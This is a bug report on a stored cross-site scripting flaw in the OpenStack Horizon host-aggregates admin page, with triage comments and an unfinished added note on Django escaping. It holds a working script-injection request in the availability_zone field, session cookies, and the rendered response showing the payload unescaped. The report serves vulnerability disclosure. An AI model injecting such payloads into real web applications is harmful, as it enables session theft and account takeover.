Stored Cross Site Scripting issue for /admin/aggregates/

Bug #1355487 reported by Michael Xin
Affects                         Status      Importance   Assigned to   Milestone
OpenStack Dashboard (Horizon)   New         Undecided    Unassigned
OpenStack Security Advisory     Confirmed   Medium       Unassigned

Bug Description

/admin/aggregates/ is subject to a stored cross-site scripting issue. The impacted parameter is availability_zone.

For example, here is the request for the update:
POST /admin/aggregates/1/update/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://23.253.125.245/admin/aggregates/
Content-Length: 192
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJytV1lzG0UQDo5jJ3YuAjEhHDG3wiHNPbvhSgiEACGAyVbpxaWaa7Mi0q5H2nXIw1bBC_-HP8Q7_4KelUQChQ7AerBnZ2e_6e-b7p7un9Zq_1QrOVvlY1McONsriwcuT3axNphTwgQXGGtFIyaUVnFEUiMiitJksxq7Ua9vu7vHjh3TEeWKGMKVwizmaay5xQx-lMeWI-HXku2Ru98v8l6uhu5ucqanqjLrTTGyteTc9LXL7UHRz8vuFYDNyvLgWqdDaJtw2saEtwnj1zhCqHNI2sgfT84BwGHfuHFv8n33FHy21wy_yZ1fTy48sZFWBrjZ5E0gmo9LeGpetqfz7a_co3FZ5O6T6bozAzUue8qU_cN--ejLX2_9_n1yotHH_A0hwG_dC2-2_ImrP_uN2m-2kg1bDFU_9ydrf6qVrPWt37qbrAcB_PbdKjk7tf2mKtWguO9P7_szrdqfbTUkZkKM_bl9f772T7e6J2Fa2WE_T_bu-Avdj-YqFEnJQKGOcpGRPLVpTCVDkdUaE8tTrAnBShDe3QCIiXD-mWy9uwaPYOWzzZnGEY0lFixOGWeWW0WkVQ4pEmOpXKq722F1XrpRrgbBootHYVGgflDpQd8EyJ0jgPTPVap77klFe4N-_mDsL-1312G6fHTg_PPdTRiaYnhQla6Zbo7p8mRYHKqq9i-0MjiKF2v_Uiu70H1hrmGxiEUne-avrphNROWSRQ4zjqWImOIukohyw1KMuTKakuziUuCdZSsqlV3azyaMclc-LEYPssvTp6ocFTlwebnhcqX2u4HLQpHFKiLPoYtjbWKjU2qZYFLzSJmYOh2ZNDJEWZYt8ZnV9l7iJSuBzEQLMXZYDKqhOySgWng0_dxCpBKQ7ZVGtldr_1qQ7aUlvknnqMKoSmPBeapSyqRAEdII0VgJSJ9gpQJVlkPvLF8z43TqsWvDh5ebqA8-DStq_3pD6Y3avxkoXZ6LSeE3h4_UwqhYwPkawRCmilinLMURgQuAaQl8luDuLFkwYxIS1DhQmAzA_Lca8yFtXl1sfkxiMsd8aqlwXHIljGTaOS1TDJdcStI0tRqJheY3uIvMDwtm5p8IGXOo7rvpIdwfqNw4YPF2w-Kd2r8bWFxfdLBx5xC30X8NSCkdQiRCsNgxgmVMGSQeSyS4ImXUAtcj2X3nSGCeDEoLt6RW4yBdkBHy2GFQ7r1GuXbtO0sisika8BxZREog_GBHJiRLtdbMMRUpHklHIiz14oicQi-MyMmaGaGzISIHRWXTYjRUJdiSTa6azKkSWKGGFa49WSU94__qDaFUg2ouNpRBqAoTcwx_IGaxIBYKvRXS8wp7L0_Py0Fmwm38mZ6nITRJziAZbSRjtedBsquLdqSdWdXYuRHKqTnqIMSMUZzGqXLMIBMRzR2WHEdOEJNyUGfVbW6GswYh_tX6GefjoXYx4TaajoCtaNjK2kdLHARI_A8HQUK7SFjDGBfMOqQFtYQ6BMndKh4vcZBV917oICuCzMQ6A0jFyGRuXI7-IbDiRrdrtX9_8XURwaU8TxNiZRQZRA2xLFJSoRiKudRFKbM4bTS5uRA30LmR3LvdW0GYI0KaqXM6qKN_cKZ8Dzqd0SyZjh_206DOB406H9b-o6DO7vwrmVMumxZsjkZEpDiSMTYaWah2kMbGYIpDlnVG6pBPV-jvsp3s-JNXQN-6vIRObFqXPZi2a5VLToyKgRv7j_f9dSgFbkwX9IZuqKHvG9f-E5g6P3WD3qRxKx7mbgSvbk5FaDqrsYNWOPSKk9YNelP_abJpXaqqQek_Szbdjwf9EWx1y8CF5Mr-0G39OfCfJ1ubv53cfu7i001mGheRQLg9_b-VlGbL376657_4Zc9_mWwejIpwEv6r2t9pZVuNcEubma-z7cfWeugi14O5_pvafwsY2dpfXn9XNV3nXrIL
ZVgaM6y1krGwyFqEoC1nUIFCia619N8nG6XLVV76e9mdSlftPwAqQEGv:1XGyHp:Um-2q06zpKC9jj_-kA_gP0kXeAk"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

The response is the following:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Horizon-Location: /admin/aggregates/
Vary: Cookie
Set-Cookie: sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV
7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; httponly; Path=/
Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"; Path=/
Content-Length: 0
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

The GET request looks like:
GET /admin/aggregates/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.253.125.245/admin/aggregates/
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13
oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"
Connection: keep-alive

And the response contains the injected XSS payload:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:14 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Language,Cookie,Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Language: en
Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=".eJy1V1tz20QULmkubUIbWiiXQGm4FQeovXdJBUpLuBQoBUI145eMZ2-qTG0pa0spfdAMvPDT-Bm88y84K8u0MIntMsEPyUqrPed8357rL0uVe6YVny-zsc4PrOkV-QObxdtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33e1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbI3u_nWS-TQ3s3PteTZZH2GhnpUrzZbNvMHOT9rOheAbFpURxc73QIbRNO25jwNmH8OkcIdQ5JG7nT8SYIOOxrO-5NznfPwrG9evldZt1yfPEJRUpqwGbiqwA0GxfwVG-2m_ftb-yjcZFn9tPmu3MDOS56Uhf9w37x6Ovfv_jzx3il5kf_S4IXv37P76y7lZ1f3Wrl1lrxqsmHsp-5M5U724qX-sat342XPQFu424Zn29s35WFHOT33bP77lyrcudbNYgpEWO3ue-eq9yFVvcMvJZm2M_ivTvuYvfGsQyFQcCAoY60oQ54YpKIBgyFRilMDE-wIgRLQXh3FURMiHPPp8vdDXgElXaUyYHX8cJJ6FjyQo27VDtKFNIowIJFCePMcCNJYKRFkkQ4kDZRNfSDUg362hvw4gkY4F4qZXfzSUZ7g372YOxe3u8uw-vi0YF1r3TXYKnz4UFZ2Pp1fU1bk2V-KMvKvdpK4Speq9zlVnqx--qxhkUiEp30-X-6YvrC3BMThnjAQosZx4EImeQ2DBDlmiUYc6kVJemL8wSVMn15P50gymzxMB89SLeap7IY5Rlgeb3GcqVy2x7LTJLFIiQfAfcEhE4YwZHSkVYJNUywQPFQ6ohaFeok1EQals7xkoV0TUnzMXaYD8qhPSTAmn_U_cxApBKg7Y2atjcr95an7fIc36RHsDL_zAQ0ozKJBOeJTCgLBAqRQohGUkCKBSQSQM8VNcV09rFrg_ytOuq9T8MXlXu7hvRO5a56SFvHyqTwOwLPnAMTMIESWkYC7k4LhjCVxFhpKA4JVAimAgAzW84Uic8lYw9hsgDz363Nh7S5M9v8iETkqcyvD0zMp4YKywMuhQ6YslYFCYYqmJAkSYxCYqb5Xs7U_BWfCofyvm0u4f5AZtoCivdqFO9X7gOP4uasi406h7iN_ktAnojY5kIDixAJEWxaRnAQUQbZyZAAvJUyaoCRk9D2ZFAaqJJKjj11nkbIY4eeuWs1c-3KdeZEZN004KeLyObMBLNICIQfWMVEwBKlFLNMhpKHgSUhDtTsiJyImgI67yNykJcmyUdDWYAt6aTUpFYWgArVqHDlyCLpGf8f6XkBoU2mgn4PWsJIUwbhLHTEMfyBuMaCGOgWF0jP83VNiVv9Oz03ITRJzkAZrSljleOesp1ZGmln2jV2bvl26gh2Fj2_6y-xIQIhprXkNEqkZRrpkChuccBxaAXRCQcinkrsFPNp37toX42aFaAVNdqgcuEcBwGjTt5BFhXa8CKUDYXRjHHBjEVKUEOoRVAAjOTRHAdZUNeUrHMgKR_p1I6L0RGBFdW8Xa_ch7PLRQgF9whOdmce8Hbeiu_d7i1KDDFBGGpENTEslIFEETR9iQ0TZnBSE3NCCqfsPOvZUT9ZXVyDSWc0Tabjh_3Es_NRzc7Hlbvh2dk-viRzyoN6BDuCowUGtwY_EQkOgwhrhQz0O0hhrTHFPs9aHSjIqOnpJ0tA39isgEms6cseNONaaeOVUT6wY_fJvrsJrcCt5oPe0A4VzH3jyn0Kr55r3KA3Gdzyh5kdwdZuQ0I9WY0tjMJ-VpyMbjCbus_iNWMTWQ4K93m8Zn8-6I9A1RcaCpIt-kO7_vfCfRmvr_1xZuOlSxfqzDTOQ4Fwu_m_Hhd63d3e2XNf_bbnvo7XDka5vwn3TeXutNL1mpK5w8y36cZjax1MkcveXPdd5b4HGenSP7Z_KOupcy_ehi4riRhWSgaRMMgYhGAsZ9BdQnetVOB-jFcLm8ms
cPfSO6Uq238BBl5BxA:1XGyIA:-6Qt3ZZ7PkdNVpPYJOElOMzR-9k"; httponly; Path=/
Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
Content-Type: text/html; charset=utf-8
Content-Length: 14400
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com

<!DOCTYPE html>
<html>
  <head>
    <meta content='text/html; charset=utf-8' http-equiv='Content-Type' />

    <title>Host Aggregates - OpenStack Dashboard</title>

<link rel="stylesheet" href="/static/dashboard/css/6bf08293a8e0.css" type="text/css" media="screen" />

<link rel="shortcut icon" href="/static/dashboard/img/favicon.ico"/>

<script type="text/javascript" src="/static/dashboard/js/0272dc9e5c21.js"></script>

    <script type="text/javascript" charset="utf-8">
  /*
    Added so that we can append Horizon scoped JS events to
    the DOM load events without running in to the "horizon"
    name-space not currently being defined since we load the
    scripts at the bottom of the page.
  */
  var addHorizonLoadEvent = function(func) {
    var old_onload = window.onload;

    if (typeof window.onload != 'function') {
      window.onload = func;
    } else {
      window.onload = function() {
        old_onload();
        func();
      }
    }
  }
</script>

  </head>
  <body id="" ng-app='hz'>

      <div id="container">
        <div class='topbar'>

<h1 class="brand"><a href="/home/">OpenStack Dashboard</a></h1>

<div class="context-box">
  <div id="tenant_switcher" class="dropdown switcher_bar" tabindex="1">

      <a class="dropdown-toggle" data-toggle="dropdown" href="#tenant_switcher">

    <h3>admin</h3>

      </a>

      <ul id="tenant_list" class="dropdown-menu">
        <li class='divider'></li>

              <li><a href="/auth/switch/9b2a33fc33134aae97f530bd9b2da86d/?next=/admin/">demo</a></li>

      </ul>

  </div>

</div>

<div id="user_info" class="pull-right">
  <div id="profile_editor_switcher" class="dropdown switcher_bar" tabindex='1'>
    <a class="dropdown-toggle" data-toggle="dropdown" href="#profile_editor_switcher">
      <div>admin</div>
    </a>
    <ul id="editor_list" class="dropdown-menu">
      <li class='divider'></li>
      <li><a href="/settings/">Settings</a></li>

        <li><a href="http://docs.openstack.org" target="_new">Help</a></li>

    </ul>
  </div>

  <a href="/auth/logout/">Sign Out</a>

</div>

        </div>
        <div id='main_content'>

<div class="messages">

    <div class="alert alert-block alert-success fade in">
      <a class="close" data-dismiss="alert" href="#">&times;</a>
      <p><strong>Success: </strong>Successfully updated aggregate: &quot;invisible_to_admin&lt;script&gt;xss&lt;/script&gt;.&quot;</p>
    </div>

</div>

<div class='sidebar'>

<div>
  <dl class="nav_accordion">

        <dt >
          <div>Project</div>
        </dt>

        <dd style="display:none;">

            <div><h4><div>Compute</div></h4>

            <ul>

              <li><a href="/project/" >Overview</a></li>

              <li><a href="/project/instances/" >Instances</a></li>

              <li><a href="/project/volumes/" >Volumes</a></li>

              <li><a href="/project/images/" >Images</a></li>

              <li><a href="/project/access_and_security/" >Access &amp; Security</a></li>

            </ul>

              </div>

            <div><h4><div>Network</div></h4>

            <ul>

              <li><a href="/project/network_topology/" >Network Topology</a></li>

              <li><a href="/project/networks/" >Networks</a></li>

              <li><a href="/project/routers/" >Routers</a></li>

              <li><a href="/project/loadbalancers/" >Load Balancers</a></li>

            </ul>

              </div>

            <div><h4><div>Object Store</div></h4>

            <ul>

              <li><a href="/project/containers/" >Containers</a></li>

            </ul>

              </div>

            <div><h4><div>Orchestration</div></h4>

            <ul>

              <li><a href="/project/stacks/" >Stacks</a></li>

            </ul>

              </div>

            <div><h4><div>Databases</div></h4>

            <ul>

              <li><a href="/project/databases/" >Database Instances</a></li>

              <li><a href="/project/database_backups/" >Database Backups</a></li>

            </ul>

              </div>

        </dd>

        <dt class="active">
          <div>Admin</div>
        </dt>

        <dd>

            <div><h4><div>System Panel</div></h4>

            <ul>

              <li><a href="/admin/" >Overview</a></li>

              <li><a href="/admin/hypervisors/" >Hypervisors</a></li>

              <li><a href="/admin/aggregates/" class="active" >Host Aggregates</a></li>

              <li><a href="/admin/instances/" >Instances</a></li>

              <li><a href="/admin/volumes/" >Volumes</a></li>

              <li><a href="/admin/flavors/" >Flavors</a></li>

              <li><a href="/admin/images/images/" >Images</a></li>

              <li><a href="/admin/networks/" >Networks</a></li>

              <li><a href="/admin/routers/" >Routers</a></li>

              <li><a href="/admin/info/" >System Info</a></li>

            </ul>

              </div>

            <div><h4><div>Identity Panel</div></h4>

            <ul>

              <li><a href="/admin/projects/" >Projects</a></li>

              <li><a href="/admin/users/" >Users</a></li>

            </ul>

              </div>

        </dd>

  </dl>
</div>

</div>

          <div id='content_body'>

  <div class='page-header'>
    <h2>Host Aggregates</h2>
  </div>

  <div id="host-aggregates">

<div class="table_wrapper">
  <form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />

  <table id="host_aggregates" class="table table-bordered table-striped datatable">
    <thead>

      <tr class='table_caption'>
        <th class='table_header' colspan='6'>
          <h3 class='table_title'>Host Aggregates</h3>

<div class="table_actions clearfix">

    <div class="table_search client">
        <input class="span3 example" value="" type="text" name="host_aggregates__filter__q" />
        <button type="submit" class="btn btn-small btn-search" id="host_aggregates__action_filter">Filter</button>
    </div>

                <a href='/admin/aggregates/create/' title='Create Host Aggregate' class="btn btn-small ajax-modal btn-create" id="host_aggregates__action_create">Create Host Aggregate</a>

                <button class="btn btn-small btn-danger btn-delete" id="host_aggregates__action_delete" name="action" value="host_aggregates__delete" type="submit">Delete Host Aggregates</button>

    </div>

        </th>
      </tr>

      <tr>

          <th class="multi_select_column"></th>

          <th class="sortable normal_column">Name</th>

          <th class="sortable normal_column">Availability Zone</th>

          <th class="sortable normal_column">Hosts</th>

          <th class="sortable normal_column">Metadata</th>

          <th class="actions_column">Actions</th>

      </tr>

    </thead>

    <tbody>

      <tr class="" data-display="invisible_to_admin&lt;script&gt;xss&lt;/script&gt;" data-object-id="1" id="host_aggregates__row__1">
    <td class="multi_select_column"><input class="table-row-multi-select" name="object_ids" type="checkbox" value="1" /></td><td class="sortable normal_column">invisible_to_admin&lt;script&gt;xss&lt;/script&gt;</td><td class="sortable normal_column">invisible_to_admin&lt;script&gt;alert(document.cookie)&lt;/script&gt;</td><td class="sortable normal_column"></td><td class="sortable normal_column"><li>availability_zone = invisible_to_admin<script>alert(document.cookie)</script></li></td><td class="actions_column"><div class="btn-group"><a href='/admin/aggregates/1/update/' class="btn btn-small ajax-modal btn-edit" id="host_aggregates__row_1__action_update">Edit Host Aggregate</a><a class="btn btn-small dropdown-toggle" data-toggle="dropdown" href="#">
            More
            <span class="caret"></span></a><ul class="dropdown-menu row_actions clearfix"><li class="clearfix"><a href='/admin/aggregates/1/manage_hosts/' class="btn btn-small ajax-modal btn-create" id="host_aggregates__row_1__action_manage">Manage Hosts</a></li><li class="clearfix"><button class="btn btn-small btn-danger btn-delete" id="host_aggregates__row_1__action_delete" name="action" value="host_aggregates__delete__1" type="submit">Delete Host Aggregate</button></li></ul></div></td>
</tr>

    </tbody>

    <tfoot>

      <tr>
        <td colspan="6">
          <span class="table_count">Displaying 1 item</span>

        </td>
      </tr>
    </tfoot>

  </table>

  </form>
</div>

  </div>

  <div id="availability-zones">

<div class="table_wrapper">
  <form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />

  <table id="availability_zones" class="table table-bordered table-striped datatable">
    <thead>

      <tr class='table_caption'>
        <th class='table_header' colspan='3'>
          <h3 class='table_title'>Availability Zones</h3>

<div class="table_actions clearfix">

    <div class="table_search client">
        <input class="span3 example" value="" type="text" name="availability_zones__filter__q" />
        <button type="submit" class="btn btn-small btn-search" id="availability_zones__action_filter">Filter</button>
    </div>

    </div>

        </th>
      </tr>

      <tr>

          <th class="sortable normal_column">Availability Zone Name</th>

          <th class="sortable normal_column">Hosts</th>

          <th class="sortable normal_column">Available</th>

      </tr>

    </thead>

    <tbody>

      <tr class="" data-object-id="internal" id="availability_zones__row__internal">
    <td class="sortable normal_column">internal</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>

      <tr class="" data-object-id="nova" id="availability_zones__row__nova">
    <td class="sortable normal_column">nova</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>

    </tbody>

    <tfoot>

      <tr>
        <td colspan="3">
          <span class="table_count">Displaying 2 items</span>

        </td>
      </tr>
    </tfoot>

  </table>

  </form>
</div>

  </div>

          </div>
        </div>
      </div>

    <div id="footer">

    </div>

<script type="text/javascript" src="/i18n/js/horizon/"></script>

<script type="text/javascript" src="/static/dashboard/js/b28ee7422312.js"></script>

<script type="text/html" id="modal_template">

<div class="modal hide">
  <div class='modal-header'>
    <a class='close' data-dismiss='modal'>&times;</a>
    <h3>{{title}}</h3>
  </div>
  <div class='modal-body'>
    {{body}}
  </div>
  <div class='modal-footer'>
    <a href='#' class='btn btn-primary'>{{confirm}}</a>
    <a href='#' class='btn cancel' data-dismiss='modal'>{{cancel}}</a>
  </div>
</div>

</script>

<script type="text/html" id="empty_row_template">

<tr class="odd empty"><td colspan="{{colspan}}">{{no_items_label}}</td></tr>

</script>

<script type="text/html" id="alert_message_template">

<div class="alert alert-block fade in alert-{{type}}">
  <a class="close" data-dismiss="alert" href="#">&times;</a>
  <p>
    <strong>{{type_display}}</strong>
    {{#safe}}
      {{{message}}}
    {{/safe}}
    {{^safe}}
      {{message}}
    {{/safe}}
  </p>
</div>

</script>

<script type="text/html" id="spinner-modal">

<div class="modal loading hide">
  <p>{{text}}&hellip;</p>
</div>

</script>

<script type="text/html" id="membership_template">

<ul class="nav nav-pills btn-group">
  <li class="member" data-{{step_slug}}-id="{{data_id}}">
    <span class="display_name">{{display_name}}</span>
  </li>
  <li class="active"><a class="btn btn-primary" href="#add_remove">{{text}}</a></li>
  <li class="dropdown role_options">
    <a class="dropdown-toggle" data-toggle="dropdown" href="#">
      <span class="roles_display">{{roles_label}}</span>
      <b class="caret"></b>
    </a>
    <ul class="dropdown-menu role_dropdown clearfix">
      {{#roles}}
      <li data-role-id="{{role_id}}"><i class="icon-ok"></i> {{role_name}}</li>
      {{/roles}}
    </ul>
  </li>
</ul>

</script>

<script type='text/javascript' charset='utf-8'>
  // Call init on DOM ready.
  $(document).ready(horizon.init);
</script>

    <div id="modal_wrapper" />
  </body>
</html>

Michael Xin (michael-xin) wrote :
Jeremy Stanley (fungi) wrote :

I've added an incomplete security advisory task, pending additional feedback/confirmation from Horizon core security reviewers.

Changed in ossa:
status: New → Incomplete
summary: - Reflected Cross Site Scripting issue for /admin/aggregates/
+ Stored Cross Site Scripting issue for /admin/aggregates/
description: updated
Paul McMillan (paul-mcmillan) wrote :

This looks legitimate to me. My typical comments on finding time to actually fix the root cause of this by properly rendering template snippets rather than trying to do ad-hoc sanitization still apply. The underlying framework CAN help us avoid these problems, but Horizon as written isn't allowing it to do so.
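
The difference between the escaped Name column and the raw Metadata cell in the response above, and Paul's point about escaping at render time instead of ad-hoc sanitisation, as an added example that is not Horizon's own code: SafeString, mark_safe and escape are minimal stand-ins for the Django helpers of the same name so the block runs without Django, and the row data is constructed from the report's payload.

```python
# Added example (not Horizon's code). Django's template layer auto-escapes plain
# strings but emits anything marked "safe" verbatim; a column that assembles its
# own <li> markup from raw values and marks the result safe bypasses escaping.
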